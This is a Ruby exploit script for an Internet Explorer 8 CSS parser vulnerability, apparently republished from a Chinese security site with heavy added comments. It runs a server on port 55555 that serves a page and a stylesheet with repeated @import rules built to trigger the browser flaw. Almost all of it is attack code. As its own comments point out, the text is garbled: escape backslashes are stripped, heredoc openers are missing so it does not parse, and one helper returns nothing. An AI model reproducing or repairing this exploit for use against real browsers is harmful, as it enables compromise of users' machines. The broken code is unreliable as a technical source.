Exp Internet Explorer 8 CSS Parser Exploit


#!/usr/bin/env ruby

# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)

require 'socket'
 
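def http_send(sock, data, opts={})
    # Write a minimal HTTP/1.1 response carrying +data+ to +sock+.
    #
    # opts may override :code (status code, default "200"), :message
    # (reason phrase, default "OK") and :type (Content-Type, default
    # "text/html").  The response is echoed to stdout line by line
    # before it is written; that is the only logging this server has.
    #
    # Returns true when the write succeeded and false when it raised.
    # The failure is logged instead of being swallowed silently, so a
    # client that dropped mid-response is visible in the output.
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
    opts = defaults.merge(opts)
    body = data.to_s

    # HTTP needs CRLF line endings and a blank line before the body;
    # the original wrote "rn", i.e. the backslashes of "\r\n" had been
    # lost, which produces one malformed header line.  Content-Length
    # counts bytes, not characters, hence bytesize (the payloads this
    # server sends are wide-character strings where the two differ).
    headers = [
        "HTTP/1.1 #{opts[:code]} #{opts[:message]}",
        "Date: Sat, 11 Dec 2010 14:20:23 GMT",
        "Cache-Control: no-cache",
        "Content-Type: #{opts[:type]}",
        "Pragma: no-cache",
        "Content-Length: #{body.bytesize}"
    ]
    to_send = headers.join("\r\n") + "\r\n\r\n" + body

    puts "[+] Sending:"
    to_send.each_line do |line|
        puts "    #{line.chomp}"
    end

    begin
        sock.write(to_send)
        true
    rescue StandardError => ex
        puts "[-] Write failed: #{ex.class}: #{ex.message}"
        false
    end
end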
 
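def sock_read(sock, out_str, timeout=5)
    # Wait up to +timeout+ seconds for +sock+ to become readable, then
    # read one chunk (at most 1024 bytes) into +out_str+ in place via
    # String#replace and echo it to stdout.
    #
    # Returns true when a chunk was read (out_str may be "" when the
    # peer has closed), false when the wait timed out -- the socket is
    # closed in that case -- or when select/recv raised.
    #
    # Only StandardError is rescued.  The original rescued Exception,
    # which also swallowed SystemExit and Interrupt and so made the
    # server ignore Ctrl-C while it was blocked in here.
    ready = IO.select([sock], [], [], timeout)
    unless ready
        sock.close
        return false
    end
    out_str.replace(sock.recv(1024))
    puts "[+] Received:"
    out_str.each_line do |line|
        puts "    #{line.chomp}"
    end
    true
rescue StandardError => ex
    puts "[-] Read failed: #{ex.class}: #{ex.message}"
    false
end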
 
def to_uni(str)
    # Presumably meant to widen each byte of +str+ to a two-byte
    # character: the callers prepend "xfexff", which looks like a
    # UTF-16 byte-order mark with its backslashes lost, and size a
    # placeholder at half the target length.  As shown on this page,
    # however, the loop body is the bare expression +res+, which has
    # no side effect, so every call returns "" whatever the input --
    # the append that built the result was likely lost in extraction.
    # TODO: confirm against the upstream source before relying on it.
    res = ""
    str.each_byte do |b|
        res
    end
    res
end
 
# Name under which the stylesheet is requested.  The "x00"/"x03" pairs
# look like "\x00"/"\x03" byte escapes whose backslashes were stripped
# during extraction -- TODO confirm; as shown they are literal letters.
@css_name = "x00sx03sx00sx03sx00sx03sx00sx03s"
@html_name = "test.html"
# ASCII stand-in whose widened (two bytes per character) form has the
# same byte length as css_name (integer division), so the two can be
# swapped after to_uni() without changing the surrounding layout.
placeholder = "a" * (@css_name.length/2)
 
# The page that imports the stylesheet.  As shown here the heredoc
# opener is missing: "@html =" is followed only by the terminator
# word HTML, so this does not parse and the page body that referenced
# the placeholder-named stylesheet is absent.  The original presumably
# read `@html = <<-HTML ... HTML`; confirm against the upstream source
# rather than reconstructing it.
@html =
   
HTML
# "xfexff" looks like a byte-order mark with its backslashes lost, and
# to_uni() presumably widened the page to two-byte characters; as shown
# on this page to_uni() returns "" (see its body).
@html = "xfexff" + to_uni(@html)
# Replace the widened ASCII placeholder with the raw css_name bytes.
@html.gsub!(to_uni(placeholder), @css_name)
 
# The stylesheet: four @import rules naming the placeholder.  The
# heredoc opener (presumably "@css = <<-CSS") is missing as shown, so
# these lines do not parse; only the terminator word CSS survived.
@css =
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
CSS
# Same widening and placeholder substitution as for @html above.
@css = "xfexff" + to_uni(@css)
@css.gsub!(to_uni(placeholder), @css_name)
 
# Index page body: just the html file name.  Heredoc opener missing as
# shown (presumably "@index = <<-INDEX"), so this does not parse as-is.
# Served for any GET whose request line contains "index".
@index =
#{@html_name}
INDEX
 
# Single-threaded accept loop.  TCPServer.open with only a port binds
# every interface, so anything that can reach TCP/55555 is served.
# One client is handled at a time; the loop only ends via the QUIT
# path below or an unrescued error.
TCPServer.open(55555) do |srv|
    while true
        cli = srv.accept
        req = ""
        # html, css and index are assigned but never read here.
        html = ""
        css = ""
        index = ""
        # A read timeout closes cli inside sock_read; move on.
        next unless sock_read(cli, req, 5)
        # Keep answering on this connection until a read yields nothing
        # (peer closed), times out, or a send fails.
        while req.length > 0
            if req =~ /GET/
                # Dispatch on the request line.  html_name is tested
                # before the generic "index" pattern so "test.html"
                # wins even though it contains no "index".
                if req =~ /GET.*#{Regexp.escape(@html_name)}/
                    break unless http_send(cli, @html, :type=>"text/html")
                elsif req =~ /GET.*index/
                    break unless http_send(cli, @index)
                elsif req =~ /GET.*#{Regexp.escape(@css_name)}/
                    break unless http_send(cli, @css, :type=>"text/css")
                else
                    # Every other GET path is answered with the
                    # stylesheet as well.
                    break unless http_send(cli, @css, :type=>"text/css")
                end
            elsif req =~ /QUIT/
                # Any client that sends "QUIT" terminates the whole
                # server; there is no check on who sent it.
                exit()
            end
            req = ""
            next unless sock_read(cli, req, 5)
        end
        # cli may already be closed by a timed-out sock_read; the
        # IOError from closing it twice is skipped to the next accept.
        cli.close rescue next
    end
end

文章来源于lcx.cc:Exp Internet Explorer 8 CSS Parser Exploit

